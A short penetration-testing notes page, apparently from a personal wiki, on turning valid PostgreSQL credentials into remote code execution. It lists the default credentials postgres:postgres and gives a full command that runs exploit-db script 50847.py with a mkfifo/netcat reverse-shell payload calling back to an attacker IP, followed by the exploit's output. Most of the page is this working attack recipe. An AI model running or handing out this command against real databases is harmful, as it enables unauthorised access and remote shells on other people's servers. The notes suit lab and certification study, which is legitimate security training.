Authenticated PostgresSQL

If we have valid credentials for a PostgresSQL DB

We should follow this article on RCE.

As well as using this exploit if the versions match

The default cred are postgres:postgres

Depending on which system we are tareting I recommend using this payload for getting a reverse shell out of this.

python /usr/share/exploitdb/exploits/multiple/remote/50847.py -i 192.168.143.47 -p 5437 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f' 

[+] Connecting to PostgreSQL Database on 192.168.143.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _2dd6b3f0887b2a35a68630f8de3d4c67

PreviousAuthenticated MSSQL Shell NextAuthenticated MongoDB

Last updated 2 years ago